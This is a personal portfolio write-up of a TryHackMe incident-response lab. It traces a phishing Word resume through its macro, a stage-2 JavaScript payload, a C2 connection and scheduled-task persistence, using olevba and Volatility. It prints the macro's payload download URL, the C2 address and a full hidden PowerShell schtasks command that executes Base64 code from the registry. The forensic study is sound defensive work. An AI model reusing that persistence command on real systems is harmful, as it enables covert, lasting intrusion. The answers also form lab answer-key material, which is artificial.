~/portfolio / write-ups / boogeyman-2
TryHackMe Malware Analysis & Incident Response Medium Apr '26

Boogeyman 2

Investigated a second-wave attack by the Boogeyman group, this time targeting HR via a malicious Word document resume. Used Volatility for memory forensics to trace payload execution, C2 establishment, and scheduled task persistence.

Medium
Difficulty
100%
Completion
TryHackMe
Platform
TOOLS USED
Volatility
olevba
strings
CyberChef
01

Email and Document Analysis

Q1. What email was used to send the phishing email?
email header showing sender, recipient, and attachment

using this screenshot, we can see that the email used to send was outlook

Answer: westaylor23@outlook.com
Q2. What is the email of the victim employee?

from the previous screenshot, we can see that the email of the victim is

Answer: maxine.beck@quicklogisticsorg.onmicrosoft.com
Q3. What is the name of the attached malicious document?

from the previous screenshot, we can see that the malicious document name

Answer: Resume_WesleyTaylor.doc
Q4. What is the MD5 hash of the malicious attachment?

upon extraction of the document, we run md5sum to check for its hash

md5sum output showing 52c4384a0b9e248b95804352ebec6c5b
Answer: 52c4384a0b9e248b95804352ebec6c5b
Q5. What URL is used to download the stage 2 payload based on the document's macro?

using olevba, we were able to see the document's macro without opening it.

olevba output showing macro with download URL to boogeymanisback.lol

by inspecting the macro, we see it's trying to get something from https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png

Answer: https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png
Q6. What is the name of the process that executed the newly downloaded stage 2 payload?

look at the script, it is going to execute wscript.exe

Answer: wscript.exe
Q7. What is the full file path of the malicious stage 2 payload?

the path can be seen from the screenshot

Answer: C:\\ProgramData\\update.js
02

Memory Forensics with Volatility

Q8. What is the PID of the process that executed the stage 2 payload?

we have the memory dump artifact so we can use volatility.

Volatility plugin selection for process listing

we can use this for the plugin while looking for the wscript.

Volatility pslist output showing wscript.exe PID 4260
Answer: 4260
Q9. What is the parent PID of the process that executed the stage 2 payload?

without using grep, we are able to see this

Volatility output showing PPID 1224 for wscript.exe
Answer: 1224
Q10. What URL is used to download the malicious binary executed by the stage 2 payload?

we already know this back in the screenshot when we explored the macro

Answer: https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png
Q11. What is the PID of the malicious process used to establish the C2 connection?

we know the file was named update.js. looking at the process tree

Volatility pstree showing updater.exe PID 6216 spawned from wscript

we see this.

Answer: 6216
Q12. What is the full file path of the malicious process used to establish the C2 connection?
Volatility cmdline output showing C:\Windows\Tasks\updater.exe

running the cmdline we see this.

Answer: C:\\Windows\\Tasks\\updater.exe
Q13. What is the IP address and port of the C2 connection initiated by the malicious binary?

we use the netscan profile in order to do this.

Volatility netscan output showing 128.199.95.189:8080

and we see this 128.199.95.189:8080

Answer: 128.199.95.189:8080
Q14. What is the full file path of the malicious email attachment based on the memory dump?

run the cmdline profile so you can see this

Volatility cmdline showing full INetCache path of Resume_WesleyTaylor (002).doc
Answer: C:\\Users\\maxine.beck\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\WQHGZCFI\\Resume_WesleyTaylor (002).doc
03

Scheduled Task Persistence

Q15. The attacker implanted a scheduled task right after establishing the c2 callback. What is the full command used by the attacker to maintain persistent access?

this is much of a harder question since it doesn't appear in the cmdline. so I used AI to my advantage. I used memmap here to dump schtasks related memory but the schtasks is incomplete.

Volatility memmap output for schtasks — incomplete result

I tried checking if I can use this one against the raw file itself and it was possible by using strings.

strings output on raw memory dump revealing full schtasks command

and so we got this

Answer: schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion debug).debug)))"'
Key Takeaways
  • olevba lets you read VBA macros without opening the document at all. start there, always
  • cmdline and pstree in Volatility are how you rebuild what ran and in what order. that's your starting point
  • registry + schtasks persistence is hard to catch because nothing new lands on disk. no file, no obvious alert
  • when a Volatility plugin comes back incomplete, memmap + strings usually fills in the rest

good lab. really enjoyed this one, especially the volatility sections. something about working through memory just makes the investigation feel more concrete than logs alone.

← Prev Boogeyman 1 Next → Boogeyman 3